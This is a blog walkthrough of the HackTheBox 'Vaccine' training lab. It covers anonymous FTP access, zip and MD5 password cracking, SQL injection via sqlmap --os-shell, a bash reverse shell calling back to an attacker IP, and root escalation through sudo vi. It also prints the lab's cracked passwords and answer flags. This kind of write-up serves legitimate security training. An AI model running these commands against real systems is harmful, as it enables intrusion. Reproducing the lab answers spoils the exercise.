HackTheBox – Starting Point Phase – Tier 2/

HTB Labs — Tier 2 — “Vaccine” Machine Walkthrough | By: CyberAlp0

AUTHORCyberAlp0
PUBLISHEDJuly 5, 2026
READ TIME12 MIN
HTB Labs — Tier 2 — “Vaccine” Machine Walkthrough | By: CyberAlp0

Hey Folks, this is CyberAlp0. Back again to a new walkthrough powered by HTB, Tier 2, named “Vaccine”. Vaccine is one of the VIP labs in HackTheBox — Tier 2 — Starting Point Phase. It covers many skills like SQL Injection (That is why it is called vaccine, it is some kind of injection), Password cracking, RCE, and many more. We will be delving into many challenges and tasks to reach our final flag, the root flag.

Executive Summary

Here is an executive summary of the steps we will follow:

Stage I: Scanning

The scanning phase identifies a multi-service attack surface, with the target exposing SSH, HTTP, and FTP. The presence of FTP immediately suggests a potential misconfiguration, particularly the common allowance of anonymous authentication.

Upon the Nmap scan, we will find the following information

  • Service Running: ftp
  • Service Version: 3.0.3
  • Exposed Port: 21/tcp

Stage II: Enumeration

FTP confirms the suspicion of anonymous login, allowing direct retrieval of a password-protected backup.zip file. Using password-cracking utilities — first converting the archive to a crackable format via zip2john and then recovering the password from a dictionary wordlist — reveals sensitive credentials inside the extracted files. These credentials provide access to the web application as admin, where further testing uncovers a SQL injection vulnerability.

Stage III: Exploiting

Exploitation progresses through multiple phases. SQL injection is weaponized to obtain remote code execution, leading to a reverse shell and an initial foothold on the system as the postgres user. Enumerating local configuration files reveals valid SSH credentials for the same user, enabling a more stable connection. Privilege escalation becomes possible when identifying that postgres can run vi with sudo permissions. Using vi’s built-in shell escape capability grants full root access.

Let’s not waste more time on the introduction and begin hacking!

Step 1: Connecting to the Starting Point Labs Servers.

To attack the target machine, you have to be on the same network. You can read my blog which will guide you step-by-step into connecting to the target machine.

Step 2: Spawning the Machine and Starting to Solve the Tasks.

Before solving the tasks, we shall begin scanning and enumeration to gather as much information about the machine we are about to spawn.

We can use two different scanner tools Nmap and Rustscan. Since Nmap is my favorite, we will use it and execute the following command on the terminal and leave it in the background till the scanning phase is finished.

Write the following command to start scanning for the target, and:

  • Gather information about the target’s version By using the -sV Option.
  • Perform a script scanning using the default set of scripts By using the -sC option. It’s equivalent to script=default.
  • Perform an aggressive scan, by using option (-A).
You can make use of explainshell website to have a better understanding of Linux command lines.
Scanning the target’s system using Nmap.
Scanning the target’s system using Nmap.

Task 1: Besides SSH and HTTP, what other service is hosted on this box?

Answer: ftp

Walkthrough:

According to the Nmap scan, we can see that there are lots of services that run on the target server, along with the ports these services operate through. According to the Nmap scan, the services that run are SSH, HTTP, and FTP.

Task 2: This service can be configured to allow login with any password for a specific username. What is that username?

Answer: anonymous

Walkthrough:

Remember HackTheBox lab named FAWN in TIER 0, Starting Point Phase? You can check my blog to wrap up all that we have discussed throughout this blog. We have thoroughly dived into the exploitation of the FTP service through port 22. We learned that a user can gain access to a system running FTP without a password just by using the username anonymous.

Read more about solving "FAWN” HackTheBox machine.

Task 3: What is the name of the file downloaded over this service?

Answer: backup.zip

Walkthrough:

As we have learned in the FAWN HackTheBox machine, we can have a successful login to a target system that has an FTP service running through the command

ftp -p anonymous@10.129.15.8
Login into the target system without a password using the username anonymous
Login into the target system without a password using the username anonymous

Use the ls command to navigate into the contents of the server. You can see that the only file that is uploaded to the server is the backup.zip.

You can download the zip file using the command get as shown in the screenshot below.

Download the zip file that is uploaded to the server.
Download the zip file that is uploaded to the server.
The zip file is protected with a password. We will cover how to crack it in the next tasks.
The Zip File is protected with a password.
The Zip File is protected with a password.

Also, note that, in our first initial scan using Nmap, if we had a closer look into the result of the scan, you would find that Nmap had notified us of the vulnerability that existed in the FTP service. It gave us a hint that indicates that the FTP service is subjected to exploitation through gaining access as an anonymous user.

Not only did Nmap do that for us, and logged in as an anonymous user and listed all the files that were uploaded to the server. Take a closer look at the following screenshot

Scanning the target using Nmap and gaining more information about the ability to exploit a service
Scanning the target using Nmap and gaining more information about the ability to exploit a service

Task 4: What script comes with the John The Ripper toolset and generates a hash from a password-protected zip archive in a format to allow for cracking attempts?

Answer: zip2john

Walkthrough:

Before going to the walkthrough of this task, you need to know that John the Ripper doesn’t come with scripts designed to generate hashes from password-protected zip archives.

However, John the Ripper can handle password-protected zip files with built-in support for many file formats.

There is a utility that comes with John the Ripper tool called “zip2john”. This Utility allows you to extract the necessary information from the zip file and convert it into a format John the Ripper can deal with and crack.

Type the following command to extract the useful information from the zip file in a way that JTR can handle and crack. This command will create a hash of the zip file’s password and save it in a hash.txt

sudo zip2john backup.zip > hash.txt
zip2john utility gives you the ability to extract necessary information from the zip file and convert it into a hash, which John the Ripper can deal with.
zip2john utility gives you the ability to extract necessary information from the zip file and convert it into a hash, which John the Ripper can deal with.

Following is the hash file, which JTR can deal with

The hash file that can JTR Deal with.
The hash file that can JTR Deal with.

Now, we will be using the RockYou Wordlist that comes preconfigured in Kali to crack the hash file and get the password. The word list can be found in the following path /usr/share/wordlists/rockyou.txt

sudo john --wordloists=/usr/share/wordlists/rockyou.txt hash.txt
The Password of the file.
The Password of the file.

The Password is 741852963.

Task 5: What is the password for the admin user on the website?

Answer: qwerty789

Walkthrough:

After extracting the zip file, You shall find a PHP page. Once you open it, you shall find the username admin and the password in a hash format as shown in the following screenshot

The password of the admin user hashed in an MD5 Hashing.
The password of the admin user hashed in an MD5 Hashing.

The password of the admin is hashed and its value is cb42f8734ea607eefed3b70af13bbd3.

If you find out that those points exist in your hash, this is most likely an MD5 hash.
1- The length: MD5 Hash is 32 characters long.
2- Character Set: MD5 are hexadecimal. if you find that hash consists of characters from {A-F} & Number sets from {0:9}, This is likely an MD5 hash.

One of the most popular tools for cracking MD5 hashes is hashcat. To use it, type the following command

sudo hashcat -m 0 hashfile.txt /usr/share/wordlists/rockyou.txt --show
Illustration of the hashcat command
Illustration of the hashcat command
The show option allows you to show the password after cracking the hash
The show option allows you to show the password after cracking the hash

The Password for the admin user is qwerty789

If you are running kali on a virtual machine and allcoated less than 3 GB for the RAM, You may encounter the following error when running the hashcat tool or any tool that is used in cracking passwords.
“ Not enough allocatable device memory for this attack.”
To solve this issue, Turn off the machine and allocate a 4GB (4096MB) to the ram and all will go through.

Task 6: What option can be passed to sqlmap to try to get command execution via the SQL injection?

Answer: — os-shell

Walkthrough:

Since we got the user’s password, which is “qwerty789”. We shall start exploiting this and gain access to the web application dashboard. Copy and paste the website URL and log in with the admin credentials.

After logging into the web application.
After logging into the web application.

If you want to test for a possible SQL injection vulnerability, add a single quote (‘) to the search parameter in the URL of the web application.

In this scenario, we will be searching for the word “alpha” in the search box. We will notice that the URL is as follows:

http://10.129.95.174/dashboard.php?search=alpha

Adding a single quote to the search parameter (alpha), will allow us to test whether the application handles the input properly or generates an error. If the response of the server is an error or it responds with an unexpected behavior, it might be a SQL injection vulnerability.

So, let’s give it a try by adding a single quote and using the sqlmap tool to check whether there is a vulnerability or not.

The Sqlmap tool requires getting the cookie, as it is essentail to maintain the session information. To get the cookie of the session, right click on the page and click on inspect, then press on storage, then go for the “cookie” subtab, then go for the value of the “PHPSESSID”.
The Session ID of the admin user while searching for alpha in the search box.
The Session ID of the admin user while searching for alpha in the search box.

Open the terminal and type the following command to call the sqlmap tool to see whether the web application is vulnerable to SQL injection or not.

sudo sqlmap -u "http://10.129.95.174/dashboard.php?search=alpha'" --cookie="PHPSESSID=ronvqpn0edbeb3fvct0gue88ep" --os-shell

Let’s break down the previous command line to see what each parameter does.

Illustration of the sqlmap command that is used to find whether an application is vulnerable to sqlmap or not.
Illustration of the sqlmap command that is used to find whether an application is vulnerable to sqlmap or not.

The following is the result of the sqlmap command towards the target IP.

That is where the — os-shell option comes in. The sqlmap tool managed to open a shell for us on the target server.
That is where the — os-shell option comes in. The sqlmap tool managed to open a shell for us on the target server.

Since we now have an open shell on the target server, we will try to make the shell more stable and interactive. We will be opening the Netcat to listen to any incoming requests through port 4444. Meanwhile, we will ask the target server to send a request by typing the following command.

bash -c "bash -i >& /dev/tcp/10.10.14.67/4444 0>&1"
Asking the target server to send a reverse shell to the attacker machine to have a more stable shell.
Asking the target server to send a reverse shell to the attacker machine to have a more stable shell.
To have a better understanding of how the reverse shell works, check the following short video https://www.youtube.com/shorts/Z5fGrYxI76E.

Let’s break the last command to understand how it works:

How to convert your shell into a more stable and interactive shell.
How to convert your shell into a more stable and interactive shell.
Getting the reverse shell while listening to the incoming connections through port 4444.
Getting the reverse shell while listening to the incoming connections through port 4444.

Now that we have a stable shell, let’s make it interactive, as we have previously explained in the previous machine titled “OOPSIE”

Check my write up for solving the “OOPSIE” Machine through this link.

To make the session interactive, type the following command in the terminal.

python3 -c 'import pty; pty.spawn("/bin/bash")'

Now, you are logged in as postgres. You can check the ID using the command whoami.

You are now logged in as a normal user called postgres.
You are now logged in as a normal user called postgres.

Task 7: What program can the postgres user run as root using sudo?

Answer: vi

Walkthrough:

Now, after we have a login as a normal user called postgres, we will try to escalate our privileges from a normal user to a root user by trying to find any configuration files inside the server. Usually, you will find such files in the path /var/www/html. We are trying here to find PHP files in which such credentials (users and passwords) can be found.

Cat the dashboard PHP file and grep any passwords in it.
Cat the dashboard PHP file and grep any passwords in it.

As shown in the following screenshot, you shall find the password for the user postgres himself. So, rather than having an open shell, we will be connecting to the server directly using SSH. Type the following command to grep the password.

cat dashboard.php | grep password
The user is Postgres and the password is P@s5w0rd!
The user is Postgres and the password is P@s5w0rd!

As shown in the screenshot, the user is Postgres and the password is P@s5w0rd!

We will connect as postgres using SSH. Use the following command to connect via SSH:

ssh postgres@10.129.95.174
Connecting as postgres user via SSH Connection
Connecting as postgres user via SSH Connection

Now, we have logged in as a postgres user. By typing the whoami command, we shall see the ID of the user “postgres”. To escalate the privileges, we will be typing the command sudo -l and seeing the result when shifting from normal to the root user.

Trying to escalate the privileges from a normal user to a root user by typing sudo -l
Trying to escalate the privileges from a normal user to a root user by typing sudo -l

As highlighted in the previous screenshot, the user postgres is allowed to run the following command on the machine vaccine. This command allows us to edit a config file called pg_hba.conf using Vim

Vim is an editing binary executable that is used to edit files in Linux. There is another binary executable called nano. It is used for editing files as well.

Task 8: Submit the User flag

Answer: ec9b13ca4d6229cd5cc1e09980965bf7

Walkthrough:

Since we are logged in as a normal user called postgres (as we have his credentials), it is easy to get the user flag by typing ls to list all the contents of the home directory of the user postgres. Use the cat command to fetch the user flag.

The user flag is ec9b13ca4d6229cd5cc1e09980965bf7
The user flag is ec9b13ca4d6229cd5cc1e09980965bf7

The user flag is ec9b13ca4d6229cd5cc1e09980965bf7

Task 9: Submit the Root Flag

Answer: dd6e058e814260bc70e9bbdef2715849

Walkthrough:

Let’s finish what we started in escalating the privileges. We are now able to edit the config file named “pg_hba.conf” using the vi command. Type the following command in the terminal.

sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf

Let’s break through the command to understand it more and see how it is going to be useful for us in escalating our privileges.

Break down the command that is used to escalate the privileges to a root user.
Break down the command that is used to escalate the privileges to a root user.

By executing this command with sudo, you are elevating your privileges to modify the pg_hba.conf file. This file controls client authentication rules for the PostgreSQL database server. Editing this file allows you to specify who can connect to the database server and what authentication method should be used.

By typing the following line, we will allow us to gain root privilege.

:shell
Typing (:shell) in the config file to escalate the privileges from normal user to root user.
Typing (:shell) in the config file to escalate the privileges from normal user to root user.
This sceanrio looks similar to what we done in the OOPSIE machine from HTB. In this mahcine, we noticed that there is a program is being called by any user, eventhough it is owned by the root. Thanks to SUID permissions, we managed to take and advatnge of a binary executable called cat. We created a file called cat in the /tmp, then modified the path variables to lure the terminal into calling out modified cat file instead of the binary executable (cat) in the /sbin. Thus, we had a root access. Read more about OOPSIE walkthrough by following this link.
Gaining the root privileges after prompting a shell in the config file using the vi binary executable
Gaining the root privileges after prompting a shell in the config file using the vi binary executable
If you wanted to know more information about the possible shells you may use in different binaries. Visit the following website. It will give you better understanding of the shells you may use in your exploitation stage.
Using :shell to escalate the privileges.
Using :shell to escalate the privileges.

Since we have root access, type ls to list all the contents under the /root directory. You shall find the root.txt. By fetching what’s inside it using the cat command, you will find the root flag.

The root user flag
The root user flag

The Root Flag is dd6e058e814260bc70e9bbdef2715849.

Hope you enjoyed reading my blog about solving Vaccine machine from HTB — Tier 2 — Starting Point Phase.

See You in another write-up!.

[ #vaccine ][ #Penetration Testing ][ #cyberalp0 ][ #cyberskii ][ #penetrationtesting ][ #Web Application Penetration Testing ][ #Web Application Security ][ #htb ][ #hackthebox ][ #writeups ][ #Kali Linux ][ #ippsec ][ #OSCP Preperations ][ #oopsie ]